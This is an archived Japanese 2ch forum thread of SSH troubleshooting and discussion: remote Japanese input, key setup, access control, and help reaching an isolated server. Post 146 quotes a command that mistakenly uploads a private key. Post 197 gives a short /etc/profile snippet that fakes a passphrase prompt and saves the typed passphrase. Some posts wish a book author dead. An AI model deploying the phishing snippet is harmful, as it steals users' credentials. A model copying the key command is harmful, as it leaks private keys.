SSH その8 - 暇つぶし2ch

SSH その8 ..

126:名無しさん＠お腹いっぱい。
14/10/21 17:09:45.04 .net
というわけで、このスレでのSSHに関する情報交換は全面禁止となりました。

127:名無しさん＠お腹いっぱい。
14/10/21 18:21:36.12 .net
ログインシェルをsshに変えたいんですが、chshでやろうとするとエラーになります。
どうすればいいですか？

128:名無しさん＠お腹いっぱい。
14/10/21 18:33:44.06 .net
まずはその屏風からsshとかいうシェルを出してみてください

129:名無しさん＠お腹いっぱい。
14/10/21 18:38:38.21 .net
sshはすでにインストール済みで、動作確認済みです

130:名無しさん＠お腹いっぱい。
14/10/21 18:45:40.37 .net
>>127
>>129
出来ません、出来ません。
SSHにはそんなこと出来ません。

131:名無しさん＠お腹いっぱい。
14/10/21 19:11:18.03 .net
>>127
/etc/shellsにないんじゃないか。
ログインできなくなってもしらんけど。

132:名無しさん＠お腹いっぱい。
14/10/21 19:24:07.55 .net
/etc/shellsですか、ありがとうございます。
今環境がないので明日、客先で試してみます。

133:名無しさん＠お腹いっぱい。
14/10/21 19:32:19.94 .net
加齢臭コピペがくさいです

134:名無しさん＠お腹いっぱい。
14/10/21 19:33:29.40 .net
>>126
× このスレでのSSHに関する情報交換は全面禁止となりました
○ このスレでのSSHに関するサポート乞食は全面禁止となりました

135:名無しさん＠お腹いっぱい。
14/10/26 13:36:46.74 .net
その後 132 の姿を見る者は居なかった

136:名無しさん＠お腹いっぱい。
14/10/26 21:06:55.48 .net
132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…

sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。

137:名無しさん＠お腹いっぱい。
14/10/26 21:30:38.39 .net
いつもの改変コピペ君だよ

138:名無しさん＠お腹いっぱい。
14/10/27 14:20:34.23 .net
UNIX板には死語レベルのコピペにマジレスするピュア()な中高年が多いですね

139:名無しさん＠お腹いっぱい。
14/11/23 17:53:17.21 .net
SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの？

Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)

ターミナルまたは、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。

140:名無しさん＠お腹いっぱい。
14/11/24 04:27:36.36 .net
普通はできるだろ…とりあえず文字コード合ってる？

141:名無しさん＠お腹いっぱい。
14/11/24 04:36:11.60 .net
できないじゃなくて、どうなるか書かないと。

142:名無しさん＠お腹いっぱい。
14/11/24 05:16:14.38 .net
>>139
この場合日本語入力はローカル側のが使われるんだよ。sshログイン先のホストのものではない。
必要な環境変数が設定されてないとエスパー。

143:名無しさん＠お腹いっぱい。
14/11/29 18:39:05.96 .net
>139-142

失礼しやした。

結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。

で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に書くと、
今度は、sshが、 xauth を読まなくなる。

これについては、
SSHのマニュアルか
URLﾘﾝｸ(www.unixuser.org)
個人ページ
URLﾘﾝｸ(namazu.org)
URLﾘﾝｸ(uncorrelated.no-ip.com)
を参考に対処できそう。

144:143
14/11/29 21:40:37.22 .net
自己レス

>>143

LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。

それから、
cygwin → LinuxMint へ ssh -X でリモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。

orz

145:名無しさん＠お腹いっぱい。
14/11/30 04:07:35.69 .net
.xsession

146:名無しさん＠お腹いっぱい。
14/11/30 09:01:56.33 .net
cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'

これだと秘密鍵をremotehostに持ち出すことになるよね？
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。

147:名無しさん＠お腹いっぱい。
14/11/30 10:48:50.82 .net
なんで秘密キーを公開キーのファイルに追記してんの？ｗ

148:名無しさん＠お腹いっぱい。
14/11/30 10:54:42.92 .net
>>146
公開鍵登録しろよ。多分id_rsa.pub

149:名無しさん＠お腹いっぱい。
14/12/01 10:23:39.78 .net
>>146
そんなやり方どこで聞いたんだ

150:名無しさん＠お腹いっぱい。
14/12/01 11:04:16.75 .net
>>147-149
川本安武とかいうバカが元凶のようだ。

URLﾘﾝｸ(books.google.co.jp)

151:名無しさん＠お腹いっぱい。
14/12/01 12:25:54.94 .net
「~/」を書かないんだな

152:名無しさん＠お腹いっぱい。
14/12/01 15:20:31.53 .net
~/はシェルに依存だから。
>>や;も意図したとおりに解釈してくれないかも知れないが。

153:名無しさん＠お腹いっぱい。
14/12/03 23:16:27.17 .net
~/ を解釈しないシェルって何だ？
dashもbusyboxのshも解釈するぞ

154:名無しさん＠お腹いっぱい。
14/12/03 23:38:30.85 .net
純正シェル。~はcsh由来だよ。

155:名無しさん＠お腹いっぱい。
14/12/04 00:06:43.07 .net
/bin/shがThompson ShellとかBourne ShellでOpenSSHが入ってる環境とか
無理やり作ろうとしても大変だなｗｗ

156:名無しさん＠お腹いっぱい。
14/12/04 01:00:08.15 .net
商用UNIX環境で古いものだとそういうのもあるな

157:名無しさん＠お腹いっぱい。
14/12/04 01:37:00.88 .net
うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか？

158:名無しさん＠お腹いっぱい。
14/12/04 02:02:22.75 .net
~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。

159:名無しさん＠お腹いっぱい。
14/12/04 06:52:38.02 .net
>>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。

お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?

160:名無しさん＠お腹いっぱい。
14/12/04 07:44:13.26 .net
>>150 = >>159 はここで作者disる暇あったらgihyoに本の回収絶版でも申請すれば？

161:名無しさん＠お腹いっぱい。
14/12/04 08:02:25.76 .net
正当な批判をdisってるとか。死ねば?

162:名無しさん＠お腹いっぱい。
14/12/04 08:58:42.72 .net
だから訂正でも謝罪でも訴訟でもなく作者の死を望んで何になるのよ

163:名無しさん＠お腹いっぱい。
14/12/04 09:10:17.44 .net
やっぱり川本本人か。ｗ

164:名無しさん＠お腹いっぱい。
14/12/04 09:51:36.60 .net
オッスオラ川本！

165:名無しさん＠お腹いっぱい。
14/12/04 09:54:07.71 .net
とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった

166:名無しさん＠お腹いっぱい。
14/12/04 09:56:28.68 .net
新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
URLﾘﾝｸ(www.unixuser.org)
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない

167:名無しさん＠お腹いっぱい。
14/12/04 09:58:54.50 .net
「正当な批判」は作者と出版社に直接届けないと本人のためにならないぞ
URLﾘﾝｸ(gihyo.jp)
URLﾘﾝｸ(twitter.com)

168:名無しさん＠お腹いっぱい。
14/12/04 10:55:15.15 .net
間違った記述すると、瞬殺で特定されるとかgoogleさん怖すぎ。

169:名無しさん＠お腹いっぱい。
14/12/05 00:16:32.57 .net
>>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160＝162＝作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。

170:名無しさん＠お腹いっぱい。
14/12/05 02:41:18.78 .net
>>169
著者に「死ねば」と言ったのは 159

171:名無しさん＠お腹いっぱい。
14/12/05 08:28:31.97 .net
>>170
>>159は(川本かもしれない)>>158に「死ねば」と言った。
>>158が筆者であると断定できるのは>>158だけであるが、
お前は断定している。ゆえにお前が>>158であり川本本人。

172:名無しさん＠お腹いっぱい。
14/12/05 08:46:18.64 .net
で、お前はこのスレで川本死ね川本死ねと呪詛を吐くだけで
他に被害者が出ないようになんとかしようという気は全く無いわけだ
>>167にある連絡先にクレームはちゃんとつけたのか？

173:名無しさん＠お腹いっぱい。
14/12/05 10:48:45.50 .net
>>172
当たり前だ。タダでデバッグしてやる義理は無い。

174:名無しさん＠お腹いっぱい。
14/12/05 15:58:44.63 .net
読者を危険に晒した！というほどのおおげさなことなん？

chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。

scpしてchmodする直前のスキをつくというのはナシね。

物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。

175:名無しさん＠お腹いっぱい。
14/12/05 17:09:10.53 .net
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。

そうなの? どんな危険性が?

176:名無しさん＠お腹いっぱい。
14/12/05 18:54:33.93 .net
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。
別のサーバーも同じキーペアで認証してたら何が起こるか考えてみたまえ。

177:名無しさん＠お腹いっぱい。
14/12/05 19:50:35.81 .net
>>175
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん？

178:名無しさん＠お腹いっぱい。
14/12/05 22:19:24.59 .net
>>176
いや、問題ないよね？秘密鍵のフォワードとかしてなければ

179:名無しさん＠お腹いっぱい。
14/12/05 23:00:17.54 .net
cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。

やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。

180:名無しさん＠お腹いっぱい。
14/12/05 23:21:07.02 .net
>>178
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。

181:名無しさん＠お腹いっぱい。
14/12/06 00:00:58.57 .net
>>179
まぁどいつもこいつもわかってて弄ってるだけなので……

182:名無しさん＠お腹いっぱい。
14/12/06 00:01:43.20 .net
>>180
ログイン先に秘密鍵おいておくとか頭煮えてるの？おだいじにね

183:名無しさん＠お腹いっぱい。
14/12/06 00:09:57.17 .net
>>182
おれじゃなくて>>178に言え。痴呆症ジジイ。

184:名無しさん＠お腹いっぱい。
14/12/06 02:42:15.93 .net
>>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180 >>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。

公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…

185:名無しさん＠お腹いっぱい。
14/12/06 03:02:41.76 .net
>>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。

クライアント側で何か実行とかできるのかと思った。

186:名無しさん＠お腹いっぱい。
14/12/06 07:22:31.63 .net
>>184
>>>180 >>183
>問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。

誤読だバカ。
>>176,>>180,>>183は全部オレだ。
「sshすること自体が危ない」ではなく「rootが信頼できないなら」への指摘だ。
言いがかりをつけるなら、どっちを引用したのか良く考えてからつけることだ。

187:名無しさん＠お腹いっぱい。
14/12/06 16:04:33.63 .net
誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。

一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。

188:名無しさん＠お腹いっぱい。
14/12/06 18:12:25.55 .net
>>187
不安を煽るというか、秘密鍵を意図せずアップロードする行為はどう考えても普通に危ないわｗ
正誤表が出ても初心者の類がそんなん見に行くわけがないし正誤表が出ても推奨なぞできん。

189:名無しさん＠お腹いっぱい。
14/12/06 18:25:54.91 .net
IPAに届けた上で、技評のトップページで謝罪訂正するレベル

190:名無しさん＠お腹いっぱい。
14/12/06 18:32:25.86 .net
だな
初心者がWebなんぞ見れるはずが無い

191:名無しさん＠お腹いっぱい。
14/12/06 19:15:59.16 .net
>>188
>>189
>>190
取ったな。

鬼の首。

192:名無しさん＠お腹いっぱい。
14/12/06 22:51:34.25 .net
>>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。

193:名無しさん＠お腹いっぱい。
14/12/06 23:13:35.29 .net
鬼? 雑魚だよ。

194:名無しさん＠お腹いっぱい。
14/12/06 23:57:36.44 .net
結局、ただのやっかみかよ。

195:名無しさん＠お腹いっぱい。
14/12/07 00:04:20.63 .net
>>194
どこをどう読んだらそんな解釈になるんですか川本さん

196:名無しさん＠お腹いっぱい。
14/12/07 01:02:14.05 .net
このスレに、川本さんは何人いるんだ。

197:名無しさん＠お腹いっぱい。
14/12/07 23:50:08.35 .net
悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね

# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi

198:名無しさん＠お腹いっぱい。
14/12/15 12:41:54.46 .net
良記事
URLﾘﾝｸ(togakushi.bitbucket.org)

199:名無しさん＠お腹いっぱい。
14/12/16 11:02:27.42 .net
あーあ何か変な奴に粘着されたなこのスレも…

200:名無しさん＠お腹いっぱい。
14/12/18 09:07:32.46 .net
>>199
おはよう、川本君。IPAには届け出たかね?

201:名無しさん＠お腹いっぱい。
14/12/18 11:35:04.54 .net
川本が！川本が俺を殺しに来る！！
あいつのせいで俺の鍵が流出した！！！
川本許さねえ！絶対にゆるさねえええええええええええええええええええええ！！！！！！！！！１１

これぐらいキレてもいいんだよきみ

202:名無しさん＠お腹いっぱい。
15/04/03 16:29:47.36 .net
あけましておめでとう。
みんな、22 開けて使ってるの？
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。

203:名無しさん＠お腹いっぱい。
15/04/03 22:17:35.30 .net
>>202
オレもポートは変えてる。

204:名無しさん＠お腹いっぱい。
15/04/06 09:38:02.97 .net
fail2banしてるから22のままだなあ。
premitRootLogin noだしpassword認証も受け付けてないし。

205:名無しさん＠お腹いっぱい。
15/04/06 13:57:05.84 .net
22の方が便利ってわけでもないから変えてる
わざわざ余計なログ吐かせて眺める趣味もないし

206:名無しさん＠お腹いっぱい。
15/04/07 11:27:12.23 .net
話の流れを切って悪いが、アクセス制限について質問です。
自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、
＜TCP Wrapperの場合＞/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
＜PAM認証の場合＞/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」
どっちでも同じ効果が得られる気がするんだが、挙動に違いはある？
PAM認証を用いた方が細かく制御できるってだけ？
悪い接続元を弾くタイミングが違うとか？

207:名無しさん＠お腹いっぱい。
15/04/07 16:29:56.81 .net
>>206
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。
tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。
hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。
sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。
設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。

208:名無しさん＠お腹いっぱい。
15/04/07 18:21:18.49 .net
>>207
正に知りたい答えでした。
この前に入門書を買ったばかりでググってもイマイチ分からなかったので、素人でも分かる説明で助かります。
ありがとうございました！

209:名無しさん＠お腹いっぱい。
15/04/07 23:46:54.67 .net
具体的な質問　に　的確な回答
単純明快なやりとりは見てて清清しい
いい夜をありがとう

210:名無しさん＠お腹いっぱい。
15/04/08 01:50:50.85 .net
>>206
OpenSSH 6.7以降だとtcpwrappers/libwrapのサポートが削除されてるから注意しとけよ

211:名無しさん＠お腹いっぱい。
15/04/28 11:48:29.85 .net
本日 psi.ip-colo.net からお越しになったお客様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様

212:名無しさん＠お腹いっぱい。
15/04/28 13:15:39.86 .net
もてもてだね。

213:名無しさん＠お腹いっぱい。
15/05/31 16:59:57.64 .net
Tera Term r2【テラターム】 - No.823
ｽﾚﾘﾝｸ(unix板:823番)n
823 ：823：2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age！
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。

214:名無しさん＠お腹いっぱい。
15/05/31 18:34:44.39 .net
なんか懐かしい名前だ。
Windows からは Cygwin の ssh だからどうでもいい。

215:名無しさん＠お腹いっぱい。
15/05/31 20:10:21.19 .net
自分もputtyもteratermも捨ててcygwinの使ってるわ

216:名無しさん＠お腹いっぱい。
15/05/31 22:32:37.52 .net
Cygwinはなー……ということでMSYS2派

217:名無しさん＠お腹いっぱい。
15/05/31 22:34:07.81 .net
ログ取りはscriptとか使うの？

218:名無しさん＠お腹いっぱい。
15/06/03 18:28:09.16 .net
cygwinもMSYS2も、遠からず捨てる日が来るのかな

219:名無しさん＠お腹いっぱい。
15/06/03 18:34:35.17 .net
とっくにwindowsを捨ててる

220:名無しさん＠お腹いっぱい。
15/06/04 05:26:26.98 .net
とっくにwindowsを捨ててる(ｷﾘｯ

221:名無しさん＠お腹いっぱい。
15/06/04 20:38:59.15 .net
質問失礼致します。
scpコマンドで
「リモートサーバー」と「そことローカル接続しているサーバー」で、
ファイルのやり取りは可能でしょうか？
具体的には、旧筐体から新筐体へデータ移行を行いたいのです
ただし旧筐体はネットワークから切り離されているという状況です

222:名無しさん＠お腹いっぱい。
15/06/04 20:51:37.76 .net
ローカル接続とは具体的にどのように接続しているのでしょうか？
新筐体がリモートサーバーで、旧筐体が、そこ(新筐体のことでしょうか？)とローカル接続しているサーバーですか？
新筐体と旧筐体がローカルなネットワークで接続されていて
今の場所から、旧筐体にはログインできないが、
新筐体にはログインできて、新筐体から旧筐体にはログインできるのなら
新筐体と旧筐体の間でscpなりrsyncなりなんなりと使えるでしょう。
FTPのサーバー間転送みたいなことはできませんけど。

223:名無しさん＠お腹いっぱい。
15/06/04 21:03:36.40 .net
>>222
まさにそういう事です！
新筐体から旧筐体へはどのようにログインすればいいんでしょうか？
URLﾘﾝｸ(qiita.com)
こちらなどを見たんですが、新筐体へはログイン出来ましたが、
新筐体から旧筐体へのログイン方法が分かりません

224:名無しさん＠お腹いっぱい。
15/06/04 21:35:54.66 .net
旧筐体にはsshでログインできてましたか？
まず新筐体にログインします。これは出来てるんですね。
シェルが使えるとします。
scpはsshと同じログイン方法なので、パスワードで入れていたのなら
scp 旧筐体のユーザー名@旧筐体のサーバー名(IPアドレスのほうが確実かも):旧筐体内でのファイル名なりディレクトリ名新筐体のディレクトリ名
scp root@192.168.1.20:/home/ /home
こんな感じですかね

225:名無しさん＠お腹いっぱい。
15/06/04 21:49:55.09 .net
>>224
大変ありがとうございます。
旧筐体にはログイン出来てないです
$ ssh redadmin@192.168.1.20
とやってみたんですが、駄目でした

226:名無しさん＠お腹いっぱい。
15/06/04 23:20:28.21 .net
>>225
まず、ログインできるようにしないと

227:名無しさん＠お腹いっぱい。
15/06/04 23:47:23.18 .net
>>226
これの事でしょうか？
簡単sshログイン方法
URLﾘﾝｸ(qiita.com)
新筐体と旧筐体、どちらを設定すればいいんでしょう？

228:名無しさん＠お腹いっぱい。
15/06/05 00:18:01.59 .net
そりゃあ勿論、旧筐体にsshでログインできるようにする。
今までどうやってログインしてましたか？

229:名無しさん＠お腹いっぱい。
15/06/05 00:24:12.21 .net
>>228
旧筐体にはログインした事ないです
新筐体はIPアドレス・ID・パスワードでログインしました
使用したSSHクライアントソフトは
Poderosa
Tera Term
です

230:名無しさん＠お腹いっぱい。
15/06/05 00:33:05.47 .net
>>229
管理者権限でログインしないと設定できません。
旧筐体の管理者はどうしていますか？
旧筐体の中をあけてハードディスクを取り出したりできますか？

231:名無しさん＠お腹いっぱい。
15/06/05 00:38:02.48 .net
>>230
色々本当ありがとうございます。
redadminでログイン後
rootにスイッチしました
因みにこれまでのはレンタルサーバーでの話です
旧筐体がクラックされた恐れがあるとかで、ネットワークから切り離され
新筐体へのデータ移行はサポート外なので自分でやれと言われてます

232:名無しさん＠お腹いっぱい。
15/06/05 00:40:36.82 .net
>>230
旧筐体の管理者はどうやったら分かりますか？

233:名無しさん＠お腹いっぱい。
15/06/05 00:54:44.94 .net
>>231
　redadminでログイン後
どうやってログインしたのでしょうか？
　$ ssh redadmin@192.168.1.20
　とやってみたんですが、駄目でした
もう一度やってみたら出来たのですか？

234:名無しさん＠お腹いっぱい。
15/06/05 01:08:40.42 .net
Poderosaで
新筐体IPアドレス・ID(redadmin)・パスワード
を設定してログイン
$ su → パスワードを訊かれてrootログイン
出来たのはここまでです。
$ssh-keygen
$ vi ~/.ssh/config
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
/etc/ssh/sshd_config
などをいじりましたが、旧筐体にはログイン出来ません
ssh redadmin@旧筐体のローカルIPアドレス
が旧筐体への接続コマンドだと案内されました

235:名無しさん＠お腹いっぱい。
15/06/05 03:44:48.64 .net
>>234
public keyは旧筐体に入れないとダメです。
ssh redadmin@旧筐体のローカルIPアドレス
でパスワードを聞かれませんか？

236:名無しさん＠お腹いっぱい。
15/06/05 04:34:53.37 .net
>>235
訊かれないです
Connection timed out になります。

237:名無しさん＠お腹いっぱい。
15/06/05 07:09:11.54 .net
>>236
ポートが22以外に設定されてるってことはないですか？
nmapを新筐体に入れてポートスキャンはできますか？

238:名無しさん＠お腹いっぱい。
15/06/05 07:29:50.23 .net
ネットワークから切り離されてるマシンにsshで入りたい、ってこと？

239:名無しさん＠お腹いっぱい。
15/06/05 08:28:01.68 .net
寝ている間になにかすごい事に…

240:名無しさん＠お腹いっぱい。
15/06/05 09:39:27.83 .net
>>231
データ移行はサポート範囲外でもログイン方法くらいはサポートしろよ、って言ってみ

241:名無しさん＠お腹いっぱい。
15/06/05 11:34:54.14 .net
すみません今起きました
>>237
どうやったら入れられますか？
>>238
そうです
>>240
旧筐体内のデータを移行するにはこの方法しかないと
けれどこの方法はナレッジがない為、サポート外で、
自己責任でと言われ、外部サイトを紹介されました
過去に同じような事例で同じ案内した実績があると行ってました
けれど上手く行った例は一軒も確認が取れてないそうです
>>239
メールでの問い合わせは回答が遅く
電話での問い合わせは、メールで回答すると言い、
電話受付終了直前にメールが届きます
全然進みません・・・

242:名無しさん＠お腹いっぱい。
15/06/05 11:46:31.49 .net
>>241
旧筐体が現在も稼動していて、
新筐体と同じローカルネットワークに存在して、
そのローカルネットワーク上での旧筐体のアドレスが192.168.1.20だっていうことは確かなの？
その情報はどこから入手したの？

243:名無しさん＠お腹いっぱい。
15/06/05 11:48:59.59 .net
>>242
確かだそうです（IPは途中で訂正がありましたが）
この情報はサーバー会社から頂きました
※192.168.1.20は数字を変えてあります

244:名無しさん＠お腹いっぱい。
15/06/05 11:53:20.12 .net
旧筐体のポートは22で間違いないそうです

245:名無しさん＠お腹いっぱい。
15/06/05 11:53:41.91 .net
>>243
その情報とこれをサポートから得ていて、
＞ssh redadmin@旧筐体のローカルIPアドレスが旧筐体への接続コマンドだと案内されました
新筐体からssh redadmin@旧筐体のローカルIPアドレスをやった結果がこれなら
＞Connection timed out になります。
繋がらんぞとサポートに言うだけだろ

246:名無しさん＠お腹いっぱい。
15/06/05 12:00:08.12 .net
>>245
まず最初の時点でSSHの知識がなかった為
他の手段を色々かけあいましたが、断られました
次にSSHを試してみて繋がらないので
問い合わせたところ、IPが違っていたと回答がありました
それでも繋がらないので、先程ポートを確認しましたところ
22であっているとの事でした（今再確認してもらってます）

247:名無しさん＠お腹いっぱい。
15/06/05 12:57:23.25 .net
新筐体にログインして
ping 旧筐体のローカルIP
をやってみて
Destination Host Unreachable
と表示されたら
ifconfig -a
ip route
ip rule
の結果を教えて
ただしifconfig -aのアドレスは置き換えて

248:名無しさん＠お腹いっぱい。
15/06/05 12:58:53.40 .net
結果をここに書き込むときに
IPアドレスの類は全部置き換えて

249:名無しさん＠お腹いっぱい。
15/06/05 13:03:31.06 .net
ローカルIPアドレスなら別にそのままでもいいんじゃね？

250:名無しさん＠お腹いっぱい。
15/06/05 13:06:35.82 .net
新筐体のアドレスを晒すかもしれないと思って、ねんのために

251:名無しさん＠お腹いっぱい。
15/06/05 13:08:28.39 .net
>>247
ありがとうございます
「Destination Host Unreachable」は表示されませんでした

PING 192.168.1.20 (192.168.1.20) 56(84) bytes of data.
64 bytes from 192.168.1.20: icmp_seq=1 ttl=64 time=0.626 ms
64 bytes from 192.168.1.20: icmp_seq=2 ttl=64 time=0.627 ms
64 bytes from 192.168.1.20: icmp_seq=3 ttl=64 time=0.633 ms
64 bytes from 192.168.1.20: icmp_seq=4 ttl=64 time=0.624 ms
64 bytes from 192.168.1.20: icmp_seq=5 ttl=64 time=0.631 ms
(中略)
--- 192.168.1.20 ping statistics ---
98 packets transmitted, 98 received, 0% packet loss, time 97059ms
rtt min/avg/max/mdev = 0.606/0.631/0.645/0.029 ms

252:名無しさん＠お腹いっぱい。
15/06/05 15:20:39.22 .net
もうこっちでできることはないだろう
旧筐体に触れる人じゃないと解決できない

253:名無しさん＠お腹いっぱい。
15/06/05 15:26:15.09 .net
クラックされてバックドアからしか入れなくされたのかもな

254:名無しさん＠お腹いっぱい。
15/06/05 19:01:54.94 .net
今日は、DenyHosts に引っかかる奴が一匹もいない。

255:名無しさん＠お腹いっぱい。
15/06/05 22:41:29.34 .net
>>252
そう思うのですが、応じてくれないのです(TT)
来週には旧筐体を回収すると言ってます・・・

256:名無しさん＠お腹いっぱい。
15/06/06 05:46:33.41 .net
じゃぁもう無理だな

257:名無しさん＠お腹いっぱい。
15/06/06 06:20:38.62 .net
レンタルサーバーのバックアップはどちらか行う契約になってたの?
自分で行う事になってたのなら、移行サポートは契約外サービス
向こうが行う契約ならば契約の履行を要求すればいい
ところで、新筐体からssh -vvv redadmin@192.168.1.20した結果見せてよ。

258:名無しさん＠お腹いっぱい。
15/06/06 12:56:42.57 .net
>>257
最新の規約では客側となっておりました
ssh -vvv redadmin@192.168.1.20
少々長いですが貼らして頂きます

259:名無しさん＠お腹いっぱい。
15/06/06 12:57:56.30 .net
OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
debug1: Reading configuration data /root/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug2: ssh_connect: needpriv 0
debug1: Connecting to 192.168.1.20 [192.168.1.20] port 22.
debug1: Connection established.
debug1: permanently_set_uid: 0/0
debug1: identity file /root/.ssh/identity type -1
debug3: Not a RSA1 key file /root/.ssh/id_rsa.
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug3: key_read: missing keytype
debug3: key_read: missing whitespace
(中略)
debug3: key_read: missing whitespace
debug2: key_type_from_name: unknown key type '-----END'
debug3: key_read: missing keytype
debug1: identity file /root/.ssh/id_rsa type 1
debug1: identity file /root/.ssh/id_dsa type -1
debug1: loaded 3 keys
debug1: Remote protocol version 1.99, remote software version OpenSSH_4.3p2
debug1: match: OpenSSH_4.3p2 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_4.3
debug2: fd 3 setting O_NONBLOCK
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
